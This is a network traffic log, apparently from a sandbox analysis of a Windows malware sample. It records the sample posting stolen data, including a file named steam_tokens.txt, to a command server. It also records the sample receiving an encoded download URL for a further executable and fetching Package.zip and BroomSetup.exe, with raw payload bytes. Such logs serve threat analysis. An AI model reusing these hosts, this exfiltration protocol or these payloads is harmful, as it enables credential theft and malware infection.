                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.335158110 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.346221924 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.648247004 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.656056881 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EGIDBFBFHJDGCAKEGHJE
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.962477922 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:18.988709927 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEB
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1743
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:19.290983915 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:19 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:19.336461067 CEST564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FHIECBAFBFHIJKFIJDAK
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 363
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 49 45 43 42 41 46 42 46 48 49 4a 4b 46 49 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: ------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FHIECBAFBFHIJKFIJDAKContent-Disposition: form-data; name="file"------FHIECBAFBFHIJKFIJDAK--
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:19.646888971 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:19 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:19.763180017 CEST204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 112219
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:20.397547007 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:20 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:20.436135054 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJD
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 268
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="message"her7h48r------GIIIECBGDHJJKFIDAKJD--
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:20.743670940 CEST223INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:20 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 52
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 78 4e 7a 49 75 4d 54 49 34 4c 6a 49 77 4d 79 39 30 61 57 74 30 62 32 73 75 5a 58 68 6c 66 44 42 38 4d 48 78 38
                                                                                                                                                                                                                                    Data Ascii: aHR0cDovLzE4NS4xNzIuMTI4LjIwMy90aWt0b2suZXhlfDB8MHx8


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.449734176.97.76.106807436C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.054105043 CEST185OUTGET /1/Package.zip HTTP/1.1
                                                                                                                                                                                                                                    Host: note.padd.cn.com
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248029947 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:15:55 GMT
                                                                                                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                                                                                                    Content-Length: 3884863
                                                                                                                                                                                                                                    Last-Modified: Wed, 24 Apr 2024 05:45:46 GMT
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    ETag: "66289c8a-3b473f"
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 50 4b 03 04 14 00 00 00 08 00 0b 3f 98 58 ef da 8c 80 dd c7 12 00 09 49 14 00 09 00 00 00 62 75 6e 63 68 2e 64 61 74 5c 5d 87 a2 aa 3a 16 cd af 89 8a 20 22 2a 16 10 05 54 ec 15 1b fa f7 b3 d6 4e 3c 77 66 bc ef 58 20 24 3b bb 65 b7 e4 29 a5 ac 9e af 7c 75 5d 2b bc a6 ca 55 2a 56 ea a9 7e af 81 db 9b bd d4 66 da 52 6a 65 f7 f5 b5 1d fe 1a b5 40 f5 66 f8 72 c0 df 56 0d 95 da 17 4a 2d f0 23 55 bd e7 b3 b7 bc 2a b5 de ab 3d ba 54 13 f5 45 13 35 cc 94 5a fa e3 83 aa 26 b5 9e 7a cf 95 fa f4 27 18 6b a2 8e 25 9e cb 4a 65 a9 cb 85 03 dc d4 5b 35 1e e8 cd c6 8f f7 50 c5 db 85 42 7f b5 19 40 05 ac f3 07 2e bf d4 e9 96 a8 47 eb fc 7a 5b 2a 8f 2d 42 31 e2 c3 ce d0 4a 7a 23 0c a9 ce d7 25 de bb 4a b1 fb a6 6a 06 0f d5 57 f5 a4 0e 18 af b5 00 1d 3e 36 32 eb 6a 4b 28 95 bc 0d d4 f1 a3 1a a1 9a c4 a5 02 84 45 b4 54 c9 51 7d d6 6a dd 5f 49 8b 8e 52 ee 54 45 6a a3 3e d2 f1 8b 4f c6 2a 99 3a 4a 25 6f a5 da aa 18 02 8b ec aa a6 b2 60 82 66 2b 4f a9 d6 1c 57 3e 15 87 c0 a3 dd 53 8e 49 4e 43 f5 6d ab 36 be a9 7c 77 51 bb [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: PK?XIbunch.dat\]: "*TN<wfX $;e)|u]+U*V~fRje@frVJ-#U*=TE5Z&z'k%Je[5PB@.Gz[*-B1Jz#%JjW>62jK(ETQ}j_IRTEj>O*:J%o`f+OW>SINCm6|wQxkKoD:n4P>*M_|PR@gWkXMbMH #oCC!1!RgQc "PQ3HBF|)@W6Z79d'`_6zr%a*7,.l.hvPOf!Y#Y7gv=kJN#\5]<VGU~,Xok.#?v%0+m(mahJG>mVkbBjXV$p ?<^%KA=0\(Ql>;x#W@@tIU Q/e7Ew}h^N +bRz2rfu'os}1j{'%?ZM9.|PWoc3H\4B;1465Q324$2(9j!$<<P#bLjDvG+}T6tRb"ofh>*Z5(]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248069048 CEST1289INData Raw: 9e eb 93 5a 97 53 4c ea 1d 6a 03 c2 62 55 39 25 62 42 ae d3 fa 42 88 fb 27 a8 43 b2 49 31 c3 44 5b ca ba aa 00 34 12 88 ca b9 5f 02 ba 75 fa 98 e6 aa 99 b6 d8 3a 3a ef 40 87 6c d7 24 a1 82 22 2e a6 95 3a 3b ba a7 69 a9 6a a6 7f 61 eb 16 d7 24 8a
                                                                                                                                                                                                                                    Data Ascii: ZSLjbU9%bBB'CI1D[4_u::@l$".:;ija$(i2_NXj&4Uh{"~2ReWhP<U0 ~pSM4G?wNx/OVcyb:kW!b'BF*s}f{'L)cz9A0`$zTN1
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248126030 CEST1289INData Raw: 91 e8 d4 4f 64 fd 25 3f c7 5c b6 02 a1 e3 62 97 c5 b4 36 30 5c 0f 0b a4 95 e2 4b f3 20 8b ae 74 0a d8 6f 64 c9 cd 0f 89 fb de 6f fc ee 08 20 10 e8 db 99 62 ec 25 9c 25 99 27 b2 b4 24 0c f1 b9 97 af 0f 68 ef 8d 2f cf 5f 68 0e ba fe 1c 0c ff 7d 3c
                                                                                                                                                                                                                                    Data Ascii: Od%?\b60\K todo b%%'$h/_h}<?\Z7V6]m!Nm(H|Im8z*n2jk)jPE/d\_r_"R:j4J\CsyuXx3tS9V;*,.|j\[S
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248166084 CEST1289INData Raw: 16 d3 e9 46 6e ba ef 9e 3e ac 87 cb 48 1b 8b 1b e2 6e 6b f7 dd 08 4c 39 c4 34 5e c7 86 4d 0e 9b cf 71 d7 69 4c 55 b7 78 9e 89 67 31 89 95 56 76 27 82 62 77 47 32 48 54 a5 75 d1 bb f3 1d 92 03 63 60 f8 fd e3 ff 91 d6 3d dd 13 b9 b9 73 37 31 97 f5
                                                                                                                                                                                                                                    Data Ascii: Fn>HnkL94^MqiLUxg1Vv'bwG2HTuc`=s71(g{qT-#ulNjR:Om@,kfCgsl WEO1lj$z?kLUhPA8XvqbP~iwY2.y\W=1Wq0O}Rl
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248204947 CEST1289INData Raw: e1 8d 3e ea ea fb 97 aa 06 3c ad 0a 8f f7 90 2a ca 3a 58 17 34 2e 60 db f4 ce 19 bb 1b 3d d4 b1 15 8a 22 f2 ef 2b 50 21 c1 04 c8 60 9f ba 70 95 bc 1d 95 3b 4b 05 45 2e 89 7c 18 6c 94 7f c0 2f de 2f b4 4e 9c b6 90 6d 9c b4 d5 9d 0d c4 f0 bf c7 9a
                                                                                                                                                                                                                                    Data Ascii: ><*:X4.`="+P!`p;KE.|l//Nmnkk&z'74<RY>y=O+MDcSo@x 9c;>-{];@G\{?];[Peqpq=Iqa5`D_AP_GU3[_|gYA#*8
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248244047 CEST1289INData Raw: 03 fc cc 1a 92 a0 9d cc 8c 39 c4 b5 34 53 ef 8f ac 49 03 e5 36 a9 6a e7 87 3c e7 54 4e cb 6d 1f d6 0d 6f ed c9 9e e1 e6 ec 91 bf 6b 6a 91 3e cb f1 02 2a e9 eb ac d4 5f ba 11 a4 85 50 ae f5 fa 37 21 1c 57 76 b7 7d 21 ec 4b 32 0f 40 c9 12 33 1e 43
                                                                                                                                                                                                                                    Data Ascii: 94SI6j<TNmokj>*_P7!Wv}!K2@3Cs*-<HIo5 Q0V?4v^i2D5v$ip^`RLK$*.0 ^wS~W _h*:JIEE;/?j8-
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248282909 CEST1289INData Raw: 23 92 12 a8 ed ec 3a 23 5c c7 33 cd bc 07 1c 47 cf e6 44 fb 2d e3 53 62 a2 58 17 50 1f ac 0c 92 e1 77 b6 56 b3 ba 3a 06 37 24 d5 e2 4d 74 20 4a 83 6e c1 29 9f 67 8b c1 47 5d a4 54 73 8e aa ea 13 c3 23 cc 3c 18 d3 39 ed 82 06 8b b6 ee 95 3b 16 f8
                                                                                                                                                                                                                                    Data Ascii: #:#\3GD-SbXPwV:7$Mt Jn)gG]Ts#<9;1xr5:StLE8:ihFtT%X(]d-nS(W!(.vwpv.[E%AdOZguvYHGv:u\6sEaXu6;\.*
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248322964 CEST1289INData Raw: 26 77 2e 9f 11 1f dc c1 ba f5 4f a2 64 c7 94 86 7a 5b 8f bd 8a d0 3a 30 6e e3 7e 84 38 e6 10 7d 0d c4 e3 5d c7 eb b1 98 15 a5 59 c1 e0 e0 a1 be 3e 69 cf ba 61 6a 92 e0 3b 99 7f 83 14 9a 8b f3 12 5f 4b 28 4a 28 cd c3 63 81 59 6e ed d7 e1 53 53 4d
                                                                                                                                                                                                                                    Data Ascii: &w.Odz[:0n~8}]Y>iaj;_K(J(cYnSSM2UXf2&3mtvaj8;X!_/dlI8u1J/919FI41iD:5-^kq).ptGO4B?
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248361111 CEST1289INData Raw: 00 cc 0a 32 de db 68 03 5c d7 9a 0f ef b0 e7 c6 b2 54 5e 80 d7 df 8b ec ce 42 f0 54 5a fe fc 02 eb 50 7b b8 40 bb a5 87 16 e1 d3 25 f1 f3 d0 bf ac f8 7b 4a 2e d1 42 f0 9a cc 7c 6e fe 24 14 e7 3d ea fe 36 1b 69 9b 63 f8 63 36 25 8e 5a fd b3 78 eb
                                                                                                                                                                                                                                    Data Ascii: 2h\T^BTZP{@%{J.B|n$=6icc6%Zxn1#]|D;Scv\f-!jID\$[V=!k%cpOSvu'p.B1z3z+L:4Y7U'g`
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.248398066 CEST1289INData Raw: 70 ec 91 9e 1a b6 f3 5f 25 dc f4 9b bb ac 07 63 42 0f 8f 1e 65 67 df 33 2d d4 fe c1 55 6c 20 fa 23 42 7c ce 66 ad 52 a3 fe 0a 1a 7e ae 37 c5 8c cc 51 67 6a f7 cd 70 5c d0 66 72 69 6f 08 57 5f 4e 81 f1 e9 c4 eb a2 a5 df f6 cc b5 e7 51 ae 56 b8 25
                                                                                                                                                                                                                                    Data Ascii: p_%cBeg3-Ul #B|fR~7Qgjp\frioW_NQV%#p&osj}(K^"ea/go6&v3\o{Mh3XqAOsrabEtU_P?a#sn9y3u@(T]hN5NPT#hM
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:16.442593098 CEST1289INData Raw: db 4d 87 6f fe 6d d4 ff 76 19 6e e6 d5 95 f5 08 7f 96 68 9f cf a1 4b f3 42 8e 7e c5 60 5d fa 32 76 eb b8 3d e7 fe a6 b5 ef 88 7a 69 90 a1 07 6d 40 ca 4d ad 2f f1 0f 46 61 32 9a 7c 9c bf 64 11 6f b6 a4 1a b0 1d 9d 1d 76 3e e4 76 85 e0 ad ef 6b be
                                                                                                                                                                                                                                    Data Ascii: MomvnhKB~`]2v=zim@M/Fa2|dov>vk3#qLj[G?&e<kl*9SA/vS/DMLaNjF[3);<g*2<pUyru{){N8gk{>|=r2WRBL]+=K


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.449738185.172.128.228807436C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.031114101 CEST185OUTGET /BroomSetup.exe HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.228
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201514959 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:29 GMT
                                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                    Last-Modified: Fri, 15 Mar 2024 11:59:56 GMT
                                                                                                                                                                                                                                    ETag: "4a4030-613b1bf118700"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Content-Length: 4866096
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PELX5P`55@J`J@7N<J0(08 878.texth55 `.itext<=5>5 `.dataV5X5@.bssm@7 7.idataN7P 7@.didata8p7@.tls@8z7.rdata 8z7@@.reloc08|7@B.rsrc<<@@JJ@@ [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201534033 CEST1289INData Raw: 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 06 53 79 73 74 65 6d 02 00 00 00 34 10 40 00 02 08 41 6e 73 69 43 68 61 72 01 00 00 00 00 ff 00 00 00 02 00 00 00 00 50 10 40 00 09 04 43 68 61 72 03 00 00 00 00 ff ff
                                                                                                                                                                                                                                    Data Ascii: an@FalseTrueSystem4@AnsiCharP@Charh@ShortInt@SmallInt@Integer@Byte@Word@Pointer@
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201550961 CEST1289INData Raw: 74 72 69 65 73 02 00 02 00 00 00 00 24 15 40 00 0e 07 54 4d 65 74 68 6f 64 08 00 00 00 00 00 00 00 00 02 00 00 00 e4 10 40 00 00 00 00 00 02 04 43 6f 64 65 02 00 e4 10 40 00 04 00 00 00 02 04 44 61 74 61 02 00 02 00 06 00 0b 94 7f 40 00 0c 26 6f
                                                                                                                                                                                                                                    Data Ascii: tries$@TMethod@Code@Data@&op_Equality@ @Left @Right@&op_Inequality@ @Left @Right@&op_GreaterThan@ @Left @Right@&o
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201597929 CEST1289INData Raw: 73 73 02 00 02 00 3b 00 20 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72 65 73 73 03 00 e4 10 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 12 e4 11 40 00 01 00 04 4e 61 6d 65 02 00 02 00 3b 00 a4 85 40 00 0d 4d 65 74 68 6f 64 41 64 64 72
                                                                                                                                                                                                                                    Data Ascii: ss; @MethodAddress@Self@Name;@MethodAddress@Self@NameF@MethodName@Self@Address@@=L~@QualifiedClassName@Self@
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201617956 CEST1289INData Raw: 63 65 00 00 00 00 01 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 06 53 79 73 74 65 6d 03 00 ff ff 02 00 00 00 50 1f 40 00 0f 0b 49 45 6e 75 6d 65 72 61 62 6c 65 18 1f 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 53 79 73 74 65
                                                                                                                                                                                                                                    Data Ascii: ceFSystemP@IEnumerable@System@IDispatch@FSystemD$UD$sD$@@@F@@\ @@<!@\
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201667070 CEST1289INData Raw: 40 00 01 00 00 00 00 02 00 3c 24 40 00 14 09 50 56 61 72 41 72 72 61 79 50 24 40 00 02 00 00 00 00 54 24 40 00 0e 09 54 56 61 72 41 72 72 61 79 18 00 00 00 00 00 00 00 00 06 00 00 00 cc 10 40 00 00 00 00 00 02 08 44 69 6d 43 6f 75 6e 74 02 00 cc
                                                                                                                                                                                                                                    Data Ascii: @<$@PVarArrayP$@T$@TVarArray@DimCount@Flags@ElementSize@LockCount@Data$@Bounds$@TVarRecord@PRecord@RecI
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201716900 CEST1289INData Raw: 41 00 f4 ff 24 2c 40 00 43 00 f4 ff 5a 2c 40 00 43 00 f4 ff a5 2c 40 00 43 00 f4 ff d9 2c 40 00 43 00 f4 ff 3b 2d 40 00 43 00 f4 ff 9d 2d 40 00 43 00 f4 ff ff 2d 40 00 43 00 f4 ff 61 2e 40 00 43 00 f4 ff c3 2e 40 00 43 00 f4 ff 25 2f 40 00 43 00
                                                                                                                                                                                                                                    Data Ascii: A$,@CZ,@C,@C,@C;-@C-@C-@Ca.@C.@C%/@C/@C/@CK0@C0@C1@Cq1@C1@C52@C2@C2@C;3@C~3@C3@C4@CE4@C4@C4@C=5@C5@C5@C
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201735973 CEST1289INData Raw: 0c 00 0a 53 74 61 72 74 49 6e 64 65 78 02 00 00 9c 10 40 00 08 00 05 43 6f 75 6e 74 02 00 02 00 62 00 30 e4 40 00 04 43 6f 70 79 03 00 00 00 00 00 10 00 05 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 d0 41 40 00 01 00 03 53 72 63 02 00 00 9c 10
                                                                                                                                                                                                                                    Data Ascii: StartIndex@Countb0@CopySelfA@Src@StartIndex'@Dest@Countb@CopySelf'@SrcA@Dest@StartIndex@Countb@Copy
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201771021 CEST1289INData Raw: 36 03 00 80 10 40 00 08 00 03 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 00 54 11 40 00 02 00 03 4f 66 73 02 00 02 00 43 00 d4 e8 40 00 09 52 65 61 64 49 6e 74 33 32 03 00 9c 10 40 00 08 00 03 00 00 00 00 00
                                                                                                                                                                                                                                    Data Ascii: 6@Self'@PtrT@OfsC@ReadInt32@Self'@PtrT@OfsC@ReadInt64@Self'@PtrT@OfsA@ReadPtr'@Self'@PtrT@
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.201788902 CEST1289INData Raw: 00 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 05 56 61 6c 75 65 02 00 02 00 3e 00 78 ea 40 00 11 41 6c 6c 6f 63 53 74 72 69 6e 67 41 73 41 6e 73 69 03 00 9c 27 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 b8 12 40 00 01 00
                                                                                                                                                                                                                                    Data Ascii: SelfValue>x@AllocStringAsAnsi'@Self@StrP@AllocStringAsAnsi'@Self@Str@CodePageA@AllocStringAsUnicode'@Self@Str<l@A
